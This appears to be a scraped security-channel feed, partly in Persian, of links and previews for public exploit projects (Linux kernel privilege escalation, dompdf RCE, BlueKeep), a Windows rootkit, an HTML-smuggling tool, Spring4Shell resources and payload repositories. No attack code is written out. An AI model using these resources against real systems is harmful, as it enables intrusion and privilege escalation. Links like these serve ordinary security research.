An unexpected Redis sandbox escape affecting only Debian, Ubuntu, and other derivatives
https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
A newly discovered #vulnerability (CVE-2022-25636) in the Netfilter #firewall module of #Linux kernel could be exploited to gain root privileges on vulnerable systems, escape containers or cause a kernel panic.
https://github.com/Bonfee/CVE-2022-25636
https://github.com/Bonfee/CVE-2022-25636
GitHub
GitHub - Bonfee/CVE-2022-25636: CVE-2022-25636
CVE-2022-25636. Contribute to Bonfee/CVE-2022-25636 development by creating an account on GitHub.
RCE exploit for dompdf
https://positive.security/blog/dompdf-rce
https://github.com/positive-security/dompdf-rce
https://positive.security/blog/dompdf-rce
https://github.com/positive-security/dompdf-rce
positive.security
From XSS to RCE (dompdf 0day) | Positive Security
Using a still unpatched vulnerability in the PHP library dompdf (used for rendering PDFs from HTML), we achieved RCE on a web server with merely a reflected XSS vulnerability as entry point.
CVE-2022-0337 System environment variables leak on Google Chrome, Microsoft Edge and Opera
https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera
https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera
GitHub
GitHub - Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera: 🎩 🤟🏻 [P1-$10,000] Google Chrome, Microsoft Edge and Opera…
🎩 🤟🏻 [P1-$10,000] Google Chrome, Microsoft Edge and Opera - vulnerability reported by Maciej Pulikowski - System environment variables leak - CVE-2022-0337 - Puliczek/CVE-2022-0337-PoC-Google-Chrom...
Top Search Engines for Cyber Security ⚡️📜
1️⃣http://censys.io – Censys Search Engine
2️⃣http://shodan.io – Search engine for Internet-connected devices
3️⃣http://viz.greynoise.io – GreyNoise Visualizer
4️⃣http://zoomeye.org – Cyberspace Search Engine
5️⃣http://onyphe.io – Cyber Defense Search Engine
6️⃣http://wigle.net – Wireless Network Mapping
7️⃣http://intelx.io – Intelligence X
8️⃣http://fofa.so – Cyberspace Security Search Engine
9️⃣http://hunter.io – OSINT Search Engine
🔟http://zorexeye.com – Hacker’s Search Engine
https://twitter.com/HackerGautam/status/1506932786435100674?s=20&t=ZF5EObm8IZSuBqzRZU1sJA
1️⃣http://censys.io – Censys Search Engine
2️⃣http://shodan.io – Search engine for Internet-connected devices
3️⃣http://viz.greynoise.io – GreyNoise Visualizer
4️⃣http://zoomeye.org – Cyberspace Search Engine
5️⃣http://onyphe.io – Cyber Defense Search Engine
6️⃣http://wigle.net – Wireless Network Mapping
7️⃣http://intelx.io – Intelligence X
8️⃣http://fofa.so – Cyberspace Security Search Engine
9️⃣http://hunter.io – OSINT Search Engine
🔟http://zorexeye.com – Hacker’s Search Engine
https://twitter.com/HackerGautam/status/1506932786435100674?s=20&t=ZF5EObm8IZSuBqzRZU1sJA
Censys
Censys | The Authority for Internet Intelligence and Insights
Censys empowers security teams with the most comprehensive, accurate, and up-to-date map of the internet to defend attack surfaces and hunt for threats.
Utility to craft HTML smuggled files for Red Team engagements
https://github.com/surajpkhetani/AutoSmuggle
https://github.com/surajpkhetani/AutoSmuggle
GitHub
GitHub - surajpkhetani/AutoSmuggle: Utility to craft HTML or SVG smuggled files for Red Team engagements
Utility to craft HTML or SVG smuggled files for Red Team engagements - surajpkhetani/AutoSmuggle
Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes, protect and elevate them with token manipulation.
https://github.com/XaFF-XaFF/Cronos-Rootkit
https://github.com/XaFF-XaFF/Cronos-Rootkit
GitHub
GitHub - XaFF-XaFF/Cronos-Rootkit: Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes, protect and elevate…
Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes, protect and elevate them with token manipulation. - GitHub - XaFF-XaFF/Cronos-Rootkit: Cronos is Windows 10/11 x64 rin...
DLLirant is a tool to automatize the DLL Hijacking researches on a specified binary.
https://github.com/Sh0ckFR/DLLirant
https://github.com/Sh0ckFR/DLLirant
GitHub
GitHub - Sh0ckFR/DLLirant: DLLirant is a tool to automatize the DLL Hijacking researches on a specified binary.
DLLirant is a tool to automatize the DLL Hijacking researches on a specified binary. - Sh0ckFR/DLLirant
LPE exploit targets Ubuntu 21.10 with kernel 5.13.0-37.
https://github.com/Bonfee/CVE-2022-0995
This is my exploit for CVE-2022-0995, an heap out-of-bounds write in the watch_queue Linux kernel component. It uses the same technique described in https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html.
https://github.com/Bonfee/CVE-2022-0995
This is my exploit for CVE-2022-0995, an heap out-of-bounds write in the watch_queue Linux kernel component. It uses the same technique described in https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html.
GitHub
GitHub - Bonfee/CVE-2022-0995: CVE-2022-0995 exploit
CVE-2022-0995 exploit. Contribute to Bonfee/CVE-2022-0995 development by creating an account on GitHub.
CVE-2019-0708 (BlueKeep) proof of concept allowing pre-auth RCE on Windows7
https://github.com/RICSecLab/CVE-2019-0708
https://github.com/RICSecLab/CVE-2019-0708
GitHub
GitHub - RICSecLab/CVE-2019-0708: CVE-2019-0708 (BlueKeep) proof of concept allowing pre-auth RCE on Windows7
CVE-2019-0708 (BlueKeep) proof of concept allowing pre-auth RCE on Windows7 - RICSecLab/CVE-2019-0708
https://lots-project.com/
Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites below allow attackers to use their domain or subdomain. Website design credits: LOLBAS & GTFOBins.
https://filesec.io/
Stay up-to-date with the latest file extensions being used by attackers.
If you would like to contribute
https://malapi.io/
Malware API
by https://twitter.com/mrd0x
Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites below allow attackers to use their domain or subdomain. Website design credits: LOLBAS & GTFOBins.
https://filesec.io/
Stay up-to-date with the latest file extensions being used by attackers.
If you would like to contribute
https://malapi.io/
Malware API
by https://twitter.com/mrd0x
X (formerly Twitter)
mr.d0x (@mrd0x) on X
Security researcher | Co-founder https://t.co/QxBlzp9A8w | https://t.co/zqMXQRZjQN | https://t.co/Fq7WSqTBva | https://t.co/eKezFcO6nd
This is the exploit for CVE-2022-27666, a vulnerability that achieves local privilege escalation on the latest Ubuntu Desktop 21.10.Our preliminary experiment shows this vulnerability affects the latest Ubuntu, Fedora, and Debian. Our exploit was built to attack Ubuntu Desktop 21.10.
https://github.com/plummm/CVE-2022-27666
#LPE
https://github.com/plummm/CVE-2022-27666
#LPE
GitHub
GitHub - plummm/CVE-2022-27666: Exploit for CVE-2022-27666
Exploit for CVE-2022-27666. Contribute to plummm/CVE-2022-27666 development by creating an account on GitHub.
اپ آسیب پذیر به #Spring4shell :
https://github.com/jbaines-r7/spring4shell_vulnapp
اکسپلویت :
https://news.1rj.ru/str/Peneter_Tools/274
توضیحات اضافی :
https://news.1rj.ru/str/learnpentest/513
اسکنر spring4shell :
https://github.com/jfrog/jfrog-spring-tools
https://github.com/hillu/local-spring-vuln-scanner
https://github.com/jbaines-r7/spring4shell_vulnapp
اکسپلویت :
https://news.1rj.ru/str/Peneter_Tools/274
توضیحات اضافی :
https://news.1rj.ru/str/learnpentest/513
اسکنر spring4shell :
https://github.com/jfrog/jfrog-spring-tools
https://github.com/hillu/local-spring-vuln-scanner
GitHub
GitHub - jbaines-r7/spring4shell_vulnapp: Intentionally Vulnerable to Spring4Shell
Intentionally Vulnerable to Spring4Shell. Contribute to jbaines-r7/spring4shell_vulnapp development by creating an account on GitHub.
Tools and PoCs for Windows syscall investigation.
https://github.com/daem0nc0re/AtomicSyscall#syscalldumper
https://github.com/daem0nc0re/AtomicSyscall#syscalldumper
GitHub
GitHub - daem0nc0re/AtomicSyscall: Tools and PoCs for Windows syscall investigation.
Tools and PoCs for Windows syscall investigation. Contribute to daem0nc0re/AtomicSyscall development by creating an account on GitHub.
EventPipe - An IPC method to transfer binary data between processes using event objects
https://www.x86matthew.com/view_post?id=eventpipe
https://www.x86matthew.com/view_post?id=eventpipe
14 Payload Repositories to find all the required Payloads & Attack Vectors.
https://twitter.com/harshbothra_/status/1509870706347032579?s=20
Payloads All The Things
1. https://github.com/swisskyrepo/PayloadsAllTheThings
2. https://github.com/payloadbox/
3. https://github.com/s0md3v/AwesomeXSS
4. https://github.com/0xInfection/Awesome-WAF
5. https://github.com/omurugur/SQL_Injection_Payload
6. https://github.com/Muhammd/Awesome-Payloads
7. https://github.com/foospidy/payloads
8. https://github.com/1N3/IntruderPayloads
9. https://github.com/pgaijin66/XSS-Payloads
10. https://github.com/terjanq/Tiny-XSS-Payloads
11. https://github.com/chinarulezzz/pixload
12. https://portswigger.net/web-security/cross-site-noscripting/cheat-sheet
13. https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
14. https://github.com/danielmiessler/SecLists
https://twitter.com/harshbothra_/status/1509870706347032579?s=20
Payloads All The Things
1. https://github.com/swisskyrepo/PayloadsAllTheThings
2. https://github.com/payloadbox/
3. https://github.com/s0md3v/AwesomeXSS
4. https://github.com/0xInfection/Awesome-WAF
5. https://github.com/omurugur/SQL_Injection_Payload
6. https://github.com/Muhammd/Awesome-Payloads
7. https://github.com/foospidy/payloads
8. https://github.com/1N3/IntruderPayloads
9. https://github.com/pgaijin66/XSS-Payloads
10. https://github.com/terjanq/Tiny-XSS-Payloads
11. https://github.com/chinarulezzz/pixload
12. https://portswigger.net/web-security/cross-site-noscripting/cheat-sheet
13. https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
14. https://github.com/danielmiessler/SecLists
Twitter
Harsh Bothra
14 Payload Repositories to find all the required Payloads & Attack Vectors. 🧵